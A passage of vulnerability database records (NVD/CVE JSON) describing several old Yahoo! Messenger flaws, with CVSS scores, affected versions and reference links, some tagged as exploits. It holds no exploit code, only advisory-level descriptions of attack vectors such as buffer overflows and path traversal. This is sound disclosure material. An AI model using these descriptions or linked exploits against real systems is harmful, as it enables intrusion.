      "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25547"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://securitytracker.com/id?1018204"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/932217"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/24341"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/24355"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018203"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/2094"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.exploit-db.com/exploits/4043"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://messenger.yahoo.com/security_update.php?id=060707"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/37081"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25547"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://securitytracker.com/id?1018204"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/932217"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/24341"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/24355"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018203"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/2094"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/4043"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2007-08-17 22:17
Modified
2025-04-09 00:30
Severity ?
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
References
cve@mitre.org http://osvdb.org/38221
cve@mitre.org http://secunia.com/advisories/26501
cve@mitre.org http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/
cve@mitre.org http://www.kb.cert.org/vuls/id/515968 (US Government Resource)
cve@mitre.org http://www.securityfocus.com/bid/25330
cve@mitre.org http://www.securitytracker.com/id?1018586
cve@mitre.org http://www.team509.com/expyahoo.rar
cve@mitre.org http://www.vupen.com/english/advisories/2007/2917
cve@mitre.org https://exchange.xforce.ibmcloud.com/vulnerabilities/36115
cve@mitre.org https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=64639&page=1#entry321749
af854a3a-2127-422b-91ae-364da2661108 http://osvdb.org/38221
af854a3a-2127-422b-91ae-364da2661108 http://secunia.com/advisories/26501
af854a3a-2127-422b-91ae-364da2661108 http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/
af854a3a-2127-422b-91ae-364da2661108 http://www.kb.cert.org/vuls/id/515968 (US Government Resource)
af854a3a-2127-422b-91ae-364da2661108 http://www.securityfocus.com/bid/25330
af854a3a-2127-422b-91ae-364da2661108 http://www.securitytracker.com/id?1018586
af854a3a-2127-422b-91ae-364da2661108 http://www.team509.com/expyahoo.rar
af854a3a-2127-422b-91ae-364da2661108 http://www.vupen.com/english/advisories/2007/2917
af854a3a-2127-422b-91ae-364da2661108 https://exchange.xforce.ibmcloud.com/vulnerabilities/36115
af854a3a-2127-422b-91ae-364da2661108 https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=64639&page=1#entry321749
Impacted products
Vendor Product Version
yahoo messenger 8.1.0.413



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.413:*:*:*:*:*:*:*",
              "matchCriteriaId": "40D0435F-F38D-42E2-AA34-F256B9D2B2C0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
    },
    {
      "lang": "es",
      "value": "Desbordamiento de b\u00fafer basado en mont\u00edculo (heap) en Kakadu kdu_v32m.dll en Yahoo! Messenger 8.1.0.413 permite a atacantes remotos provocar denegaci\u00f3n de servicio (ca\u00edda de aplicaci\u00f3n) a trav\u00e9s de un determinado campo de longitud en los datos JPEG2000, como se demostr\u00f3 con el env\u00edo de una solicitud de \"invitaci\u00f3n para ver mi webcam\", y la posterior inyecci\u00f3n de una DLL dentro de la aplicaci\u00f3n Yahoo! Messenger atacada cuando esta solicitud es aceptada."
    }
  ],
  "id": "CVE-2007-4391",
  "lastModified": "2025-04-09T00:30:58.490",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.3,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 10.0,
        "obtainAllPrivilege": true,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2007-08-17T22:17:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://osvdb.org/38221"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/26501"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/515968"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/25330"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1018586"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.team509.com/expyahoo.rar"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2007/2917"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/38221"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/26501"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/515968"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/25330"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1018586"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.team509.com/expyahoo.rar"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2007/2917"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2005-02-17 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions.
Impacted products
Vendor Product Version
yahoo messenger 5.5
yahoo messenger 5.6
yahoo messenger 5.6.0.1351
yahoo messenger 6.0
yahoo messenger 6.0.0.1750



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
              "matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
              "matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
    }
  ],
  "id": "CVE-2005-0243",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-02-17T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/13712"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2005-2/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/13712"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2005-2/advisory/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2006-09-25 01:07
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service.
Impacted products
Vendor Product Version
yahoo messenger *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1F32DA0-0851-4093-8380-F4EA5F53F47C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
    },
    {
      "lang": "es",
      "value": "Yahoo! Messenger para WAP permite guardar mensajes que contienen JavaScript, lo cual permite a atacantes con la complicidad del usuario inyectar secuencias de comandos web o HTML de su elecci\u00f3n a trav\u00e9s de una URL en el servicio en l\u00ednea."
    }
  ],
  "id": "CVE-2006-4975",
  "lastModified": "2025-04-03T01:03:51.193",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "HIGH",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 2.6,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 4.9,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2006-09-25T01:07:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/1626"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/1626"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CVE-2004-0043 (GCVE-0-2004-0043)
Vulnerability from cvelistv5
Published
2004-01-14 05:00
Modified
2024-08-08 00:01
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature.
References
http://marc.info/?l=bugtraq&m=107357996802255&w=2 (mailing-list, x_refsource_BUGTRAQ)
http://secunia.com/advisories/10573 (third-party-advisory, x_refsource_SECUNIA)
http://www.securitytracker.com/id?1008651 (vdb-entry, x_refsource_SECTRACK)
http://www.securityfocus.com/bid/9383 (vdb-entry, x_refsource_BID)
http://www.osvdb.org/3437 (vdb-entry, x_refsource_OSVDB)
http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html (mailing-list, x_refsource_FULLDISC)
https://exchange.xforce.ibmcloud.com/vulnerabilities/14171 (vdb-entry, x_refsource_XF)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:01:23.619Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
          },
          {
            "name": "10573",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/10573"
          },
          {
            "name": "1008651",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1008651"
          },
          {
            "name": "9383",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/9383"
          },
          {
            "name": "3437",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/3437"
          },
          {
            "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
          },
          {
            "name": "yahoo-messenger-filename-bo(14171)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-01-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
        },
        {
          "name": "10573",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/10573"
        },
        {
          "name": "1008651",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1008651"
        },
        {
          "name": "9383",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/9383"
        },
        {
          "name": "3437",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/3437"
        },
        {
          "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
        },
        {
          "name": "yahoo-messenger-filename-bo(14171)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0043",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
            },
            {
              "name": "10573",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/10573"
            },
            {
              "name": "1008651",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1008651"
            },
            {
              "name": "9383",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/9383"
            },
            {
              "name": "3437",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/3437"
            },
            {
              "name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
              "refsource": "FULLDISC",
              "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
            },
            {
              "name": "yahoo-messenger-filename-bo(14171)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2004-0043",
    "datePublished": "2004-01-14T05:00:00",
    "dateReserved": "2004-01-08T00:00:00",
    "dateUpdated": "2024-08-08T00:01:23.619Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2005-1618 (GCVE-0-2005-1618)
Vulnerability from cvelistv5
Published
2005-05-16 04:00
Modified
2024-08-07 21:59
Severity ?
CWE
  • n/a
Summary
The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an & (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server.
References
http://marc.info/?l=bugtraq&m=111601904204055&w=2 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/13626 (vdb-entry, x_refsource_BID)
http://www.osvdb.org/16816 (vdb-entry, x_refsource_OSVDB)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T21:59:23.506Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
          },
          {
            "name": "13626",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/13626"
          },
          {
            "name": "16816",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/16816"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-05-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
        },
        {
          "name": "13626",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/13626"
        },
        {
          "name": "16816",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/16816"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-1618",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
            },
            {
              "name": "13626",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/13626"
            },
            {
              "name": "16816",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/16816"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-1618",
    "datePublished": "2005-05-16T04:00:00",
    "dateReserved": "2005-05-16T00:00:00",
    "dateUpdated": "2024-08-07T21:59:23.506Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-5017 (GCVE-0-2007-5017)
Vulnerability from cvelistv5
Published
2007-09-20 21:00
Modified
2024-08-07 15:17
Severity ?
CWE
  • n/a
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:17:28.168Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
